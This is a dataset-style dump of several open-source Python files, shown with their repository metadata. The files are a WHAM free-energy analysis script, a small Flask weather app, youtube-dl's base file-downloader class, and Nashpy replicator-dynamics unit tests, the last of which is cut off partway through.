repo_name
stringlengths
5
92
path
stringlengths
4
221
copies
stringclasses
19 values
size
stringlengths
4
6
content
stringlengths
766
896k
license
stringclasses
15 values
hash
int64
-9,223,277,421,539,062,000
9,223,102,107B
line_mean
float64
6.51
99.9
line_max
int64
32
997
alpha_frac
float64
0.25
0.96
autogenerated
bool
1 class
ratio
float64
1.5
13.6
config_test
bool
2 classes
has_no_keywords
bool
2 classes
few_assignments
bool
1 class
sunhwan/NAMD-replica
wham/myptwham_pt_grand.py
1
10158
from StringIO import StringIO import sys, os import numpy as np os.environ["CC"] = "gcc-4.9" os.environ["CXX"] = "g++-4.9" debug = False n_max = False if len(sys.argv) > 1: n_max = int(sys.argv[1]) input = sys.stdin pmf_filename = input.readline().strip() # stores pmf rho_filename = input.readline().strip() # stores average density bia_filename = input.readline().strip() # stores biased distribution fff_filename = input.readline().strip() # stores F(i) temperature = float(input.readline().strip()) xmin, xmax, deltax, is_x_periodic = map(float, input.readline().strip().split()) umin, umax, deltau, ntemp = map(float, input.readline().strip().split()) vmin, vmax, deltav = map(float, input.readline().strip().split()) nwin, niter, fifreq = map(int, input.readline().strip().split()) tol = map(float, input.readline().strip().split()) is_x_periodic = bool(is_x_periodic) nbinx = int((xmax - xmin) / deltax + 0.5) nbinu = int(abs(umax - umin) / deltau + 0.5) nbinv = int(abs(vmax - vmin) / deltav + 0.5) ntemp = int(ntemp) kb = 0.0019872 kbt = kb * temperature beta0 = 1.0/kbt if debug: temperature = 283.15 kbt = kb * temperature beta0 = 1.0/kbt k1 = np.zeros(nwin) cx1 = np.zeros(nwin) temp = np.zeros(ntemp) beta = np.zeros((nwin, ntemp)) tseries = np.empty(nwin, dtype='S') hist = np.zeros((nwin, ntemp, nbinx, nbinu, nbinv), dtype=np.int) nb_data = np.zeros((nwin, ntemp), dtype=np.int) x1 = lambda j: xmin + (j+1)*deltax - 0.5*deltax u1 = lambda j: (j+1)*deltau - 0.5*deltau v1 = lambda j: (j+1)*deltav - 0.5*deltav energy = np.zeros((nbinx, nbinu)) press = 1.01325 * 1.4383 * 10**-5 data_range = [[None, None], [None, None], [None, None]] for j in range(ntemp): for i in range(nwin): fname = input.readline().strip() tseries[i] = fname line = input.readline().strip() cx1[i], k1[i], temp[j] = map(float, line.split()[:3]) beta[i,j] = 1 / (kb * temp[j]) def mkhist(fname, xmin, xmax, ymin, ymax, deltax, deltay, ihist, jtemp, k, cx): xdata = [] udata = [] vdata = [] count = 0 for line in open(fname): time, x, u, v = map(float, line.strip().split()[:4]) xdata.append(x) udata.append(u) vdata.append(v) if debug and len(xdata) > 10000: break if n_max and len(xdata) > n_max: break x = np.array(xdata) u = np.array(udata) v = np.array(vdata) u = u - k*(x-cx)**2 #+ press * v xbins = [xmin+i*deltax for i in range(nbinx+1)] ubins = [umin+i*deltau for i in range(nbinu+1)] vbins = [vmin+i*deltav for i in range(nbinv+1)] data = np.array((x,u,v)).transpose() hist[ihist, jtemp], edges = np.histogramdd(data, bins=(xbins, ubins, vbins), range=((xmin, xmax), (umin, umax), (vmin, vmax))) nb_data[ihist, jtemp] = np.sum(hist[ihist,jtemp]) if data_range[0][0] is None or np.min(x) < data_range[0][0]: data_range[0][0] = np.min(x) if data_range[0][1] is None or np.max(x) > data_range[0][1]: data_range[0][1] = np.max(x) if data_range[1][0] is None or np.min(u) < data_range[1][0]: data_range[1][0] = np.min(u) if data_range[1][1] is None or np.max(u) > data_range[1][1]: data_range[1][1] = np.max(u) if data_range[2][0] is None or np.min(v) < data_range[2][0]: data_range[2][0] = np.min(v) if data_range[2][1] is None or np.max(v) > data_range[2][1]: data_range[2][1] = np.max(v) xedges = edges[0] uedges = edges[1] print 'statistics for timeseries # ', ihist print 'minx:', '%8.3f' % np.min(x), 'maxx:', '%8.3f' % np.max(x) print 'average x', '%8.3f' % np.average(x), 'rms x', '%8.3f' % np.std(x) print 'minu:', '%8.3f' % np.min(u), 'maxu:', '%8.3f' % np.max(u) print 'average u', '%8.3f' % np.average(u), 'rms u', '%8.3f' % np.std(u) print 'statistics for histogram # ', ihist print int(np.sum(hist[ihist,jtemp])), 'points in the histogram x' print 'average x', '%8.3f' % (np.sum([hist[ihist,jtemp,i,:]*(xedges[i]+xedges[i+1])/2 for i in range(nbinx)])/np.sum(hist[ihist,jtemp])) print 'average u', '%8.3f' % (np.sum([hist[ihist,jtemp,:,i]*(uedges[i]+uedges[i+1])/2 for i in range(nbinu)])/np.sum(hist[ihist,jtemp])) print mkhist(fname, xmin, xmax, umin, umax, deltax, deltau, i, j, k1[i], cx1[i]) print 'minx:', '%8.3f' % data_range[0][0], 'maxx:', '%8.3f' % data_range[0][1] print 'minu:', '%8.3f' % data_range[1][0], 'maxu:', '%8.3f' % data_range[1][1] print 'minv:', '%8.3f' % data_range[2][0], 'maxu:', '%8.3f' % data_range[2][1] print hist.shape # write biased distribution f = open(bia_filename, 'w') for j in range(nbinx): for k in range(nbinu): f.write("%8d\n" % np.sum(hist[:,:,j,k])) # iterate wham equation to unbias and recombine the histogram TOP = np.zeros((nbinx, nbinu, nbinv), dtype=np.int32) BOT = np.zeros((nbinx, nbinu, nbinv)) W1 = np.zeros((nwin, ntemp, nbinx)) U1 = np.zeros((nwin, ntemp, nbinu)) V1 = np.zeros((nwin, ntemp, nbinv)) for i in range(nwin): for j in range(ntemp): for k in range(nbinx): W1[i,j,k] = k1[i]*(x1(k) - cx1[i])**2 for l in range(nbinu): U1[i,j,l] = u1(l) for m in range(nbinv): V1[i,j,m] = v1(m) * press for k in range(nbinx): for l in range(nbinu): for m in range(nbinv): TOP[k,l,m] = np.sum(hist[:,:,k,l,m]) np.set_printoptions(linewidth=200) from scipy import weave from scipy.weave import converters def wham2d(nb_data, TOP, nbinx, nbinu, nbinv, W1, V1, U1, beta, beta0, F=None): icycle = 1 rho = np.zeros((nbinx, nbinu, nbinv), np.double) if F is None: F = np.zeros((nwin, ntemp)) F2 = np.zeros((nwin, ntemp), np.double) while icycle < niter: code_pragma = """ double beta1; beta1 = beta0; #pragma omp parallel num_threads(nthreads) { #pragma omp for collapse(3) for (int k=0; k<nbinx; k++) { for (int l=0; l<nbinu; l++) { for (int m=0; m<nbinv; m++) { double BOT = 0.0; for (int i=0; i<nwin; i++) { for (int j=0; j<ntemp; j++) { BOT += nb_data(i,j)*exp(F(i,j)-beta(i,j)*(W1(i,j,k)+U1(i,j,l)+V1(i,j,m)) +beta1*(U1(i,j,l)+V1(i,j,m))); } } if (BOT < 1e-100 || TOP(k,l,m) == 0) continue; rho(k,l,m) = TOP(k,l,m) / BOT; } } } #pragma omp for collapse(2) for (int i=0; i<nwin; i++) { for (int j=0; j<ntemp; j++) { for (int k=0; k<nbinx; k++) { for (int l=0; l<nbinu; l++) { for (int m=0; m<nbinv; m++) { F2(i,j) += rho(k,l,m)*exp(-beta(i,j)*(W1(i,j,k)+U1(i,j,l)+V1(i,j,m)) + beta1*(U1(i,j,l)+V1(i,j,m))); } } } } } } """ nthreads = 4 weave.inline(code_pragma, ['F', 'F2', 'rho', 'nb_data', 'beta', 'W1', 'U1', 'V1', 'beta0', 'TOP', 'nbinx', 'nbinu', 'nbinv', 'nwin', 'ntemp', 'nthreads'], type_converters=converters.blitz, extra_compile_args=['-O3 -fopenmp'], extra_link_args=['-O3 -fopenmp'], headers=['<omp.h>'])#, library_dirs=['/Users/sunhwan/local/python/lib']) converged = True F2 = -np.log(F2) F2 = F2 -np.min(F2) diff = np.max(np.abs(F2 - F)) if diff > tol: converged = False print 'round = ', icycle, 'diff = ', diff icycle += 1 if ( fifreq != 0 and icycle % fifreq == 0 ) or ( icycle == niter or converged ): print F2 #open(fff_filename, 'w').write("%8i %s\n" % (icycle, " ".join(["%8.3f" % f for f in F2]))) if icycle == niter or converged: break F = F2 F2 = np.zeros((nwin, ntemp)) return F2, rho F = np.zeros((nwin, ntemp)) for i in range(ntemp): temperature = temp[i] kbt = kb * temperature beta0 = 1.0/kbt fff = "%s.%d" % (fff_filename, i) if i == 0 and os.path.exists(fff): F = np.loadtxt(fff) F, rho = wham2d(nb_data, TOP, nbinx, nbinu, nbinv, W1, V1, U1, beta, beta0, F) np.savetxt(fff, F) # jacobian for j in range(nbinx): rho[j] = rho[j] / x1(j)**2 # average energy avgur = np.zeros(nbinx) avgur2 = np.zeros(nbinx) avgvr = np.zeros(nbinx) rho = rho / np.sum(rho) for k in range(nbinx): for l in range(nbinu): for m in range(nbinv): if not (TOP[k,l,m] > 0): continue avgur[k] += rho[k,l,m]/np.sum(rho[k]) * u1(l) avgur2[k] += rho[k,l,m]/np.sum(rho[k]) * u1(l) * u1(l) avgvr[k] += rho[k,l,m]/np.sum(rho[k]) * v1(m) # find maximum rho rho = np.sum(rho, axis=(1,2)) jmin = np.argmax(rho) rhomax = rho[jmin] #print 'maximum density at: x = ', x1(jmin) x0 = int(( 10.55 - xmin ) / deltax) rhomax = np.sum(rho[x0-5:x0+5])/10 avgu = np.sum(avgur[nbinx-10:])/10 avgv = np.sum(avgvr[nbinx-10:])/10 #cv = ( avgur2 - avgur**2 ) / kbt / temperature #avgcv = np.average(cv) print temperature, avgu, avgv # make PMF from the rho np.seterr(divide='ignore') pmf = -kbt * np.log(rho/rhomax) open("%s.%d" % (pmf_filename, i), 'w').write("\n".join(["%8.3f %12.8f %12.8f %12.8f" % (x1(j), pmf[j], avgvr[j]-avgv, avgur[j]-avgu) for j in range(nbinx)])) open("%s.%d" % (rho_filename, i), 'w').write("\n".join(["%8.3f %12.8f" % (x1(j), rho[j]) for j in range(nbinx)]))
bsd-2-clause
4,400,316,292,958,923,300
37.332075
340
0.511616
false
2.680211
false
false
false
zackzachariah/feelslike
weather.py
1
1194
# Created 2014 by Zack Sheppard. Licensed under the MIT License (see LICENSE file) """ Main handlers for the two pages that make up the clear-weather app """ from flask import Flask, request, url_for import api_endpoint, os, web_endpoints app = Flask(__name__) if (not app.debug): import logging from logging import StreamHandler app.logger.setLevel(logging.INFO) app.logger.addHandler(StreamHandler()) def path_to_style(lessPath): return url_for('static', filename='styles/css/' + lessPath + '.css') def path_to_image(imagePath): return url_for('static', filename='img/' + imagePath) def path_to_script(scriptPath): return url_for('static', filename='scripts/' + scriptPath + '.js') def google_analytics(): return os.environ.get('GOOGLE_ANALYTICS', None) app.jinja_env.globals.update(path_to_style = path_to_style) app.jinja_env.globals.update(path_to_image = path_to_image) app.jinja_env.globals.update(path_to_script = path_to_script) app.jinja_env.globals.update(google_analytics = google_analytics) @app.before_request def before_request(): app.logger.info('Handling base: ' + request.base_url) web_endpoints.setupWebRoutes(app) api_endpoint.setupApiRoute(app)
mit
-6,699,916,966,404,352,000
29.615385
82
0.742044
false
3.218329
false
false
false
valmynd/MediaFetcher
src/plugins/youtube_dl/youtube_dl/downloader/common.py
1
12568
from __future__ import division, unicode_literals import os import re import sys import time import random from ..compat import compat_os_name from ..utils import ( decodeArgument, encodeFilename, error_to_compat_str, format_bytes, shell_quote, timeconvert, ) class FileDownloader(object): """File Downloader class. File downloader objects are the ones responsible of downloading the actual video file and writing it to disk. File downloaders accept a lot of parameters. In order not to saturate the object constructor with arguments, it receives a dictionary of options instead. Available options: verbose: Print additional info to stdout. quiet: Do not print messages to stdout. ratelimit: Download speed limit, in bytes/sec. retries: Number of times to retry for HTTP error 5xx buffersize: Size of download buffer in bytes. noresizebuffer: Do not automatically resize the download buffer. continuedl: Try to continue downloads if possible. noprogress: Do not print the progress bar. logtostderr: Log messages to stderr instead of stdout. consoletitle: Display progress in console window's titlebar. nopart: Do not use temporary .part files. updatetime: Use the Last-modified header to set output file timestamps. test: Download only first bytes to test the downloader. min_filesize: Skip files smaller than this size max_filesize: Skip files larger than this size xattr_set_filesize: Set ytdl.filesize user xattribute with expected size. external_downloader_args: A list of additional command-line arguments for the external downloader. hls_use_mpegts: Use the mpegts container for HLS videos. http_chunk_size: Size of a chunk for chunk-based HTTP downloading. May be useful for bypassing bandwidth throttling imposed by a webserver (experimental) Subclasses of this one must re-define the real_download method. """ _TEST_FILE_SIZE = 10241 params = None def __init__(self, ydl, params): """Create a FileDownloader object with the given options.""" self.ydl = ydl self._progress_hooks = [] self.params = params self.add_progress_hook(self.report_progress) @staticmethod def format_seconds(seconds): (mins, secs) = divmod(seconds, 60) (hours, mins) = divmod(mins, 60) if hours > 99: return '--:--:--' if hours == 0: return '%02d:%02d' % (mins, secs) else: return '%02d:%02d:%02d' % (hours, mins, secs) @staticmethod def calc_percent(byte_counter, data_len): if data_len is None: return None return float(byte_counter) / float(data_len) * 100.0 @staticmethod def format_percent(percent): if percent is None: return '---.-%' return '%6s' % ('%3.1f%%' % percent) @staticmethod def calc_eta(start, now, total, current): if total is None: return None if now is None: now = time.time() dif = now - start if current == 0 or dif < 0.001: # One millisecond return None rate = float(current) / dif return int((float(total) - float(current)) / rate) @staticmethod def format_eta(eta): if eta is None: return '--:--' return FileDownloader.format_seconds(eta) @staticmethod def calc_speed(start, now, bytes): dif = now - start if bytes == 0 or dif < 0.001: # One millisecond return None return float(bytes) / dif @staticmethod def format_speed(speed): if speed is None: return '%10s' % '---b/s' return '%10s' % ('%s/s' % format_bytes(speed)) @staticmethod def format_retries(retries): return 'inf' if retries == float('inf') else '%.0f' % retries @staticmethod def best_block_size(elapsed_time, bytes): new_min = max(bytes / 2.0, 1.0) new_max = min(max(bytes * 2.0, 1.0), 4194304) # Do not surpass 4 MB if elapsed_time < 0.001: return int(new_max) rate = bytes / elapsed_time if rate > new_max: return int(new_max) if rate < new_min: return int(new_min) return int(rate) @staticmethod def parse_bytes(bytestr): """Parse a string indicating a byte quantity into an integer.""" matchobj = re.match(r'(?i)^(\d+(?:\.\d+)?)([kMGTPEZY]?)$', bytestr) if matchobj is None: return None number = float(matchobj.group(1)) multiplier = 1024.0 ** 'bkmgtpezy'.index(matchobj.group(2).lower()) return int(round(number * multiplier)) def to_screen(self, *args, **kargs): self.ydl.to_screen(*args, **kargs) def to_stderr(self, message): self.ydl.to_screen(message) def to_console_title(self, message): self.ydl.to_console_title(message) def trouble(self, *args, **kargs): self.ydl.trouble(*args, **kargs) def report_warning(self, *args, **kargs): self.ydl.report_warning(*args, **kargs) def report_error(self, *args, **kargs): self.ydl.report_error(*args, **kargs) def slow_down(self, start_time, now, byte_counter): """Sleep if the download speed is over the rate limit.""" rate_limit = self.params.get('ratelimit') if rate_limit is None or byte_counter == 0: return if now is None: now = time.time() elapsed = now - start_time if elapsed <= 0.0: return speed = float(byte_counter) / elapsed if speed > rate_limit: time.sleep(max((byte_counter // rate_limit) - elapsed, 0)) def temp_name(self, filename): """Returns a temporary filename for the given filename.""" if self.params.get('nopart', False) or filename == '-' or \ (os.path.exists(encodeFilename(filename)) and not os.path.isfile(encodeFilename(filename))): return filename return filename + '.part' def undo_temp_name(self, filename): if filename.endswith('.part'): return filename[:-len('.part')] return filename def ytdl_filename(self, filename): return filename + '.ytdl' def try_rename(self, old_filename, new_filename): try: if old_filename == new_filename: return os.rename(encodeFilename(old_filename), encodeFilename(new_filename)) except (IOError, OSError) as err: self.report_error('unable to rename file: %s' % error_to_compat_str(err)) def try_utime(self, filename, last_modified_hdr): """Try to set the last-modified time of the given file.""" if last_modified_hdr is None: return if not os.path.isfile(encodeFilename(filename)): return timestr = last_modified_hdr if timestr is None: return filetime = timeconvert(timestr) if filetime is None: return filetime # Ignore obviously invalid dates if filetime == 0: return try: os.utime(filename, (time.time(), filetime)) except Exception: pass return filetime def report_destination(self, filename): """Report destination filename.""" self.to_screen('[download] Destination: ' + filename) def _report_progress_status(self, msg, is_last_line=False): fullmsg = '[download] ' + msg if self.params.get('progress_with_newline', False): self.to_screen(fullmsg) else: if compat_os_name == 'nt': prev_len = getattr(self, '_report_progress_prev_line_length', 0) if prev_len > len(fullmsg): fullmsg += ' ' * (prev_len - len(fullmsg)) self._report_progress_prev_line_length = len(fullmsg) clear_line = '\r' else: clear_line = ('\r\x1b[K' if sys.stderr.isatty() else '\r') self.to_screen(clear_line + fullmsg, skip_eol=not is_last_line) self.to_console_title('youtube-dl ' + msg) def report_progress(self, s): if s['status'] == 'finished': if self.params.get('noprogress', False): self.to_screen('[download] Download completed') else: msg_template = '100%%' if s.get('total_bytes') is not None: s['_total_bytes_str'] = format_bytes(s['total_bytes']) msg_template += ' of %(_total_bytes_str)s' if s.get('elapsed') is not None: s['_elapsed_str'] = self.format_seconds(s['elapsed']) msg_template += ' in %(_elapsed_str)s' self._report_progress_status( msg_template % s, is_last_line=True) if self.params.get('noprogress'): return if s['status'] != 'downloading': return if s.get('eta') is not None: s['_eta_str'] = self.format_eta(s['eta']) else: s['_eta_str'] = 'Unknown ETA' if s.get('total_bytes') and s.get('downloaded_bytes') is not None: s['_percent_str'] = self.format_percent(100 * s['downloaded_bytes'] / s['total_bytes']) elif s.get('total_bytes_estimate') and s.get('downloaded_bytes') is not None: s['_percent_str'] = self.format_percent(100 * s['downloaded_bytes'] / s['total_bytes_estimate']) else: if s.get('downloaded_bytes') == 0: s['_percent_str'] = self.format_percent(0) else: s['_percent_str'] = 'Unknown %' if s.get('speed') is not None: s['_speed_str'] = self.format_speed(s['speed']) else: s['_speed_str'] = 'Unknown speed' if s.get('total_bytes') is not None: s['_total_bytes_str'] = format_bytes(s['total_bytes']) msg_template = '%(_percent_str)s of %(_total_bytes_str)s at %(_speed_str)s ETA %(_eta_str)s' elif s.get('total_bytes_estimate') is not None: s['_total_bytes_estimate_str'] = format_bytes(s['total_bytes_estimate']) msg_template = '%(_percent_str)s of ~%(_total_bytes_estimate_str)s at %(_speed_str)s ETA %(_eta_str)s' else: if s.get('downloaded_bytes') is not None: s['_downloaded_bytes_str'] = format_bytes(s['downloaded_bytes']) if s.get('elapsed'): s['_elapsed_str'] = self.format_seconds(s['elapsed']) msg_template = '%(_downloaded_bytes_str)s at %(_speed_str)s (%(_elapsed_str)s)' else: msg_template = '%(_downloaded_bytes_str)s at %(_speed_str)s' else: msg_template = '%(_percent_str)s % at %(_speed_str)s ETA %(_eta_str)s' self._report_progress_status(msg_template % s) def report_resuming_byte(self, resume_len): """Report attempt to resume at given byte.""" self.to_screen('[download] Resuming download at byte %s' % resume_len) def report_retry(self, err, count, retries): """Report retry in case of HTTP error 5xx""" self.to_screen( '[download] Got server HTTP error: %s. Retrying (attempt %d of %s)...' % (error_to_compat_str(err), count, self.format_retries(retries))) def report_file_already_downloaded(self, file_name): """Report file has already been fully downloaded.""" try: self.to_screen('[download] %s has already been downloaded' % file_name) except UnicodeEncodeError: self.to_screen('[download] The file has already been downloaded') def report_unable_to_resume(self): """Report it was impossible to resume download.""" self.to_screen('[download] Unable to resume') def download(self, filename, info_dict): """Download to a filename using the info from info_dict Return True on success and False otherwise """ nooverwrites_and_exists = ( self.params.get('nooverwrites', False) and os.path.exists(encodeFilename(filename)) ) if not hasattr(filename, 'write'): continuedl_and_exists = ( self.params.get('continuedl', True) and os.path.isfile(encodeFilename(filename)) and not self.params.get('nopart', False) ) # Check file already present if filename != '-' and (nooverwrites_and_exists or continuedl_and_exists): self.report_file_already_downloaded(filename) self._hook_progress({ 'filename': filename, 'status': 'finished', 'total_bytes': os.path.getsize(encodeFilename(filename)), }) return True min_sleep_interval = self.params.get('sleep_interval') if min_sleep_interval: max_sleep_interval = self.params.get('max_sleep_interval', min_sleep_interval) sleep_interval = random.uniform(min_sleep_interval, max_sleep_interval) self.to_screen( '[download] Sleeping %s seconds...' % ( int(sleep_interval) if sleep_interval.is_integer() else '%.2f' % sleep_interval)) time.sleep(sleep_interval) return self.real_download(filename, info_dict) def real_download(self, filename, info_dict): """Real download process. Redefine in subclasses.""" raise NotImplementedError('This method must be implemented by subclasses') def _hook_progress(self, status): for ph in self._progress_hooks: ph(status) def add_progress_hook(self, ph): # See YoutubeDl.py (search for progress_hooks) for a description of # this interface self._progress_hooks.append(ph) def _debug_cmd(self, args, exe=None): if not self.params.get('verbose', False): return str_args = [decodeArgument(a) for a in args] if exe is None: exe = os.path.basename(str_args[0]) self.to_screen('[debug] %s command line: %s' % ( exe, shell_quote(str_args)))
gpl-3.0
557,000,624,049,092,600
31.308483
105
0.667489
false
3.151454
false
false
false
drvinceknight/Nashpy
tests/unit/test_replicator_dynamics.py
1
62289
""" Tests for Replicator Dynamics """ import numpy as np import pytest from hypothesis import given, settings from hypothesis.strategies import integers from hypothesis.extra.numpy import arrays from nashpy.learning.replicator_dynamics import ( get_derivative_of_fitness, replicator_dynamics, get_derivative_of_asymmetric_fitness, asymmetric_replicator_dynamics, ) @given(M=arrays(np.int8, (3, 3))) def test_property_get_derivative_of_fitness(M): t = 0 x = np.zeros(M.shape[1]) derivative_of_fitness = get_derivative_of_fitness(x, t, M) assert len(derivative_of_fitness) == len(x) def test_get_derivative_of_fitness(): M = np.array([[3, 2, 3], [4, 1, 1], [2, 3, 1]]) x_values = ( np.array([1, 0, 0]), np.array([1 / 2, 1 / 2, 0]), np.array([0, 1 / 4, 3 / 4]), np.array([1 / 5, 2 / 5, 2 / 5]), np.array([1 / 2, 0, 1 / 2]), np.array([2 / 4, 1 / 4, 1 / 4]), ) derivative_values = ( np.array([0, 0, 0]), np.array([0, 0, 0]), np.array([0.0, -0.09375, 0.09375]), np.array([0.128, -0.144, 0.016]), np.array([0.375, 0.0, -0.375]), np.array([0.125, 0.0, -0.125]), ) for x_value, expected_derivative in zip(x_values, derivative_values): derivative = get_derivative_of_fitness(x=x_value, t=0, A=M) assert np.allclose(derivative, expected_derivative), x_value @given(M=arrays(np.int8, (3, 3))) def test_property_of_output_dimension_for_games_of_size_3(M): xs = replicator_dynamics(M) assert all(len(x) == 3 for x in xs) @given(M=arrays(np.int8, (4, 4))) def test_property_of_output_dimension_for_games_of_size_4(M): xs = replicator_dynamics(M) assert all(len(x) == 4 for x in xs) def test_replicator_dynamics_example_1(): M = np.array([[3, 2], [4, 1]]) y0 = np.array([0.9, 0.1]) timepoints = np.linspace(0, 10, 100) expected_xs_over_time = np.array( [ [0.9, 0.1], [0.89256013, 0.10743987], [0.88479436, 0.11520564], [0.87671801, 0.12328199], [0.86834987, 0.13165013], [0.8597121, 0.1402879], [0.8508299, 0.1491701], [0.8417312, 0.1582688], [0.83244622, 0.16755378], [0.82300701, 0.17699299], [0.81344687, 0.18655313], [0.80379989, 0.19620011], [0.79410031, 0.20589969], [0.78438204, 0.21561796], [0.77467816, 0.22532184], [0.76502043, 0.23497957], [0.75543894, 0.24456106], [0.74596174, 0.25403826], [0.73661466, 0.26338534], [0.72742107, 0.27257893], [0.7184018, 0.2815982], [0.70957507, 0.29042493], [0.70095654, 0.29904346], [0.69255932, 0.30744068], [0.6843941, 0.3156059], [0.67646927, 0.32353073], [0.66879107, 0.33120893], [0.66136378, 0.33863622], [0.65418987, 0.34581013], [0.64727021, 0.35272979], [0.64060422, 0.35939578], [0.63419006, 0.36580994], [0.62802483, 0.37197517], [0.62210466, 0.37789534], [0.61642492, 0.38357508], [0.61098033, 0.38901967], [0.60576506, 0.39423494], [0.60077288, 0.39922712], [0.59599723, 0.40400277], [0.59143133, 0.40856867], [0.58706824, 0.41293176], [0.5829009, 0.4170991], [0.57892225, 0.42107775], [0.57512523, 0.42487477], [0.57150283, 0.42849717], [0.56804814, 0.43195186], [0.56475435, 0.43524565], [0.56161481, 0.43838519], [0.558623, 0.441377], [0.55577261, 0.44422739], [0.55305749, 0.44694251], [0.55047167, 0.44952833], [0.5480094, 0.4519906], [0.54566512, 0.45433488], [0.54343348, 0.45656652], [0.54130932, 0.45869068], [0.53928768, 0.46071232], [0.53736381, 0.46263619], [0.53553315, 0.46446685], [0.53379131, 0.46620869], [0.53213411, 0.46786589], [0.53055754, 0.46944246], [0.52905777, 0.47094223], [0.52763113, 0.47236887], [0.52627413, 0.47372587], [0.52498342, 0.47501658], [0.52375581, 0.47624419], [0.52258827, 0.47741173], [0.52147788, 0.47852212], [0.52042188, 0.47957812], [0.51941764, 0.48058236], [0.51846265, 0.48153735], [0.51755449, 0.48244551], [0.51669091, 0.48330909], [0.51586971, 0.48413029], [0.51508885, 0.48491115], [0.51434634, 0.48565366], [0.51364031, 0.48635969], [0.51296897, 0.48703103], [0.51233064, 0.48766936], [0.51172369, 0.48827631], [0.51114658, 0.48885342], [0.51059785, 0.48940215], [0.51007612, 0.48992388], [0.50958005, 0.49041995], [0.50910838, 0.49089162], [0.50865992, 0.49134008], [0.50823353, 0.49176647], [0.50782813, 0.49217187], [0.50744267, 0.49255733], [0.50707619, 0.49292381], [0.50672775, 0.49327225], [0.50639645, 0.49360355], [0.50608147, 0.49391853], [0.50578199, 0.49421801], [0.50549726, 0.49450274], [0.50522655, 0.49477345], [0.50496916, 0.49503084], [0.50472445, 0.49527555], [0.50449178, 0.49550822], ], ) xs = replicator_dynamics(y0=y0, timepoints=timepoints, A=M) assert np.allclose(xs, expected_xs_over_time) def test_replicator_dynamics_example_2(): M = np.array([[3, 2], [4, 1]]) y0 = np.array([0.65, 0.35]) timepoints = np.linspace(0, 10, 100) expected_xs_over_time = np.array( [ [0.65, 0.35], [0.64323298, 0.35676702], [0.63671861, 0.36328139], [0.63045449, 0.36954551], [0.62443708, 0.37556292], [0.61866205, 0.38133795], [0.61312433, 0.38687567], [0.60781832, 0.39218168], [0.60273792, 0.39726208], [0.5978767, 0.4021233], [0.59322796, 0.40677204], [0.5887848, 0.4112152], [0.58454021, 0.41545979], [0.58048714, 0.41951286], [0.57661851, 0.42338149], [0.57292729, 0.42707271], [0.56940652, 0.43059348], [0.56604936, 0.43395064], [0.56284908, 0.43715092], [0.55979911, 0.44020089], [0.55689305, 0.44310695], [0.5541247, 0.4458753], [0.551488, 0.448512], [0.54897713, 0.45102287], [0.54658644, 0.45341356], [0.5443105, 0.4556895], [0.54214408, 0.45785592], [0.54008213, 0.45991787], [0.53811982, 0.46188018], [0.53625251, 0.46374749], [0.53447575, 0.46552425], [0.53278527, 0.46721473], [0.53117701, 0.46882299], [0.52964705, 0.47035295], [0.52819167, 0.47180833], [0.5268073, 0.4731927], [0.52549054, 0.47450946], [0.52423814, 0.47576186], [0.52304699, 0.47695301], [0.52191414, 0.47808586], [0.52083678, 0.47916322], [0.5198122, 0.4801878], [0.51883785, 0.48116215], [0.51791129, 0.48208871], [0.5170302, 0.4829698], [0.51619235, 0.48380765], [0.51539564, 0.48460436], [0.51463806, 0.48536194], [0.51391769, 0.48608231], [0.51323273, 0.48676727], [0.51258143, 0.48741857], [0.51196214, 0.48803786], [0.51137331, 0.48862669], [0.51081343, 0.48918657], [0.51028109, 0.48971891], [0.50977494, 0.49022506], [0.50929368, 0.49070632], [0.50883611, 0.49116389], [0.50840105, 0.49159895], [0.5079874, 0.4920126], [0.5075941, 0.4924059], [0.50722017, 0.49277983], [0.50686464, 0.49313536], [0.5065266, 0.4934734], [0.50620521, 0.49379479], [0.50589964, 0.49410036], [0.50560912, 0.49439088], [0.5053329, 0.4946671], [0.50507027, 0.49492973], [0.50482058, 0.49517942], [0.50458318, 0.49541682], [0.50435748, 0.49564252], [0.50414288, 0.49585712], [0.50393885, 0.49606115], [0.50374487, 0.49625513], [0.50356044, 0.49643956], [0.5033851, 0.4966149], [0.50321838, 0.49678162], [0.50305988, 0.49694012], [0.50290918, 0.49709082], [0.50276591, 0.49723409], [0.50262969, 0.49737031], [0.50250018, 0.49749982], [0.50237704, 0.49762296], [0.50225997, 0.49774003], [0.50214867, 0.49785133], [0.50204285, 0.49795715], [0.50194224, 0.49805776], [0.50184658, 0.49815342], [0.50175564, 0.49824436], [0.50166917, 0.49833083], [0.50158696, 0.49841304], [0.50150881, 0.49849119], [0.5014345, 0.4985655], [0.50136385, 0.49863615], [0.50129668, 0.49870332], [0.50123281, 0.49876719], [0.5011721, 0.4988279], [0.50111437, 0.49888563], [0.50105949, 0.49894051], ] ) xs = replicator_dynamics(y0=y0, timepoints=timepoints, A=M) assert np.allclose(xs, expected_xs_over_time) def test_replicator_dynamics_example_3_default_y0(): M = np.array([[8, 2], [5, 3]]) timepoints = np.linspace(0, 10, 100) expected_xs_over_time = np.array( [ [5.00000000e-01, 5.00000000e-01], [5.26546322e-01, 4.73453678e-01], [5.55724197e-01, 4.44275803e-01], [5.87511410e-01, 4.12488590e-01], [6.21728489e-01, 3.78271511e-01], [6.57990146e-01, 3.42009854e-01], [6.95672143e-01, 3.04327857e-01], [7.33912742e-01, 2.66087258e-01], [7.71667086e-01, 2.28332914e-01], [8.07818764e-01, 1.92181236e-01], [8.41329566e-01, 1.58670434e-01], [8.71386505e-01, 1.28613495e-01], [8.97500124e-01, 1.02499876e-01], [9.19528237e-01, 8.04717629e-02], [9.37629038e-01, 6.23709623e-02], [9.52172012e-01, 4.78279882e-02], [9.63640143e-01, 3.63598573e-02], [9.72547714e-01, 2.74522863e-02], [9.79383883e-01, 2.06161168e-02], [9.84581519e-01, 1.54184812e-02], [9.88504989e-01, 1.14950108e-02], [9.91450448e-01, 8.54955249e-03], [9.93652534e-01, 6.34746643e-03], [9.95293742e-01, 4.70625842e-03], [9.96514084e-01, 3.48591598e-03], [9.97419907e-01, 2.58009292e-03], [9.98091404e-01, 1.90859574e-03], [9.98588714e-01, 1.41128551e-03], [9.98956761e-01, 1.04323949e-03], [9.99228997e-01, 7.71002583e-04], [9.99430288e-01, 5.69712057e-04], [9.99579078e-01, 4.20922069e-04], [9.99689037e-01, 3.10962897e-04], [9.99770287e-01, 2.29713463e-04], [9.99830315e-01, 1.69684731e-04], [9.99874662e-01, 1.25338089e-04], [9.99907422e-01, 9.25784618e-05], [9.99931619e-01, 6.83805402e-05], [9.99949493e-01, 5.05073861e-05], [9.99962695e-01, 3.73049637e-05], [9.99972447e-01, 2.75532065e-05], [9.99979649e-01, 2.03505730e-05], [9.99984969e-01, 1.50308175e-05], 